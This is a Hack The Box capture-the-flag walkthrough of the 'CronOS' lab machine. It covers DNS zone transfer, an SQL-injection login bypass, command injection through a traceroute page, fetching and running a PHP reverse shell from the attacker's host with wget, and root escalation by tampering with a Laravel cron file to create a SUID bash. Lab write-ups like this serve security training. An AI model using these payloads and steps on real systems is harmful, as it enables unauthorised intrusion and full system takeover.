Hack The Box – CronOS Walkthrough
Introduction
This was an intermediate Linux machine that involved exploiting an SQL injection vulnerability to gain access to a traceroute page affected by a remote command vulnerability in order to obtain a reverse shell, and exploiting a PHP function used in a cron hob to gain root-level code execution and therefore a root shell.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
Running another Nmap scan using the -p- flag to scan all ports:
From the above port scans, port 80 and port 53 would be the next things to enumerate.
DNS Enumeration
Performing an initial DNS enumeration with Nmap, running all DNS-related scripts:
The above scan did not bring back any useful information sadly. Performing a reverse
DNS zone transfer is the simplest mechanism to replicate DNS records across DNS servers, it is used to avoid the labor involved in updating the DNS information on multiple servers, although it can allow attackers to discover domain names that would otherwise not be publicly available.
Performing a DNS zone transfer identifies admin.cronos.htb:
Modifying the /etc/hosts file, adding a new line for admin.cronos.htb:
Enumerating Port 80
When navigating to the web server via the IP address on a browser, the default Apache2 page shows up:
When navigating to admin.cronos.htb, a login page is displayed instead:
The login page seemed to be vulnerable to the following MySQL injection:
admin'--
After logging in, the web application takes to the welcome.php page, which contains a Traceroute functionality:
Since this is probably handled in PHP, the code can be interrupted by adding a semicolon, therefore allowing attackers to inject arbitrary commands:
Exploiting Remote Command Execution
Copying the Laudanum PHP reverse shell to the working directory and updating the IP address and port:
Setting up a Python web server to host the shell:
Using Wget to download the shell:
wget 10.10.14.14/php-reverse-shell.php
The request was received on the Python web server:
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
Running a command to execute the shell using PHP:
php php-reverse-shell.php
A callback was received, granting a reverse shell as the www-data user:
The following steps can be done to obtain an interactive shell:
- Running “python -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
- Hitting CTRL+Z to background the process and go back to our host
- Running “stty raw -echo” on our host
- Hitting “fg + ENTER” to go back to our reverse shell
Privilege Escalation
Checking the existing cron jobs
An interesting Laravel cron job is found:
Searching for the “schedule” function, it seems to be in the Kernel.php file, under /var/www/laravel
Copying the Kernel.txt file to the web server root directory so it can be downloaded from Kali:
Accessing the file and copying it to create a local version:
Adding an extra line to the file to execute a bash command that will create a SUID version of the BASH binary:
Transferring the new Kernel.php file to the victim host, replacing the original one:
After about a minute, the scheduler has run and the SUID BASH binary has been created:
After executing the new SUID bash binary with the -p flag, which allows to execute binaries as the owner of it, this grants root access to the host:
Conclusion
This was a really fun box, and although the vulnerabilities to exploit were not really advanced it does a great job at demonstrating how important it is to enumerate all the available services and to test for all major vulnerabilities. The privilege escalation process was fairly straightforward but still fun nonetheless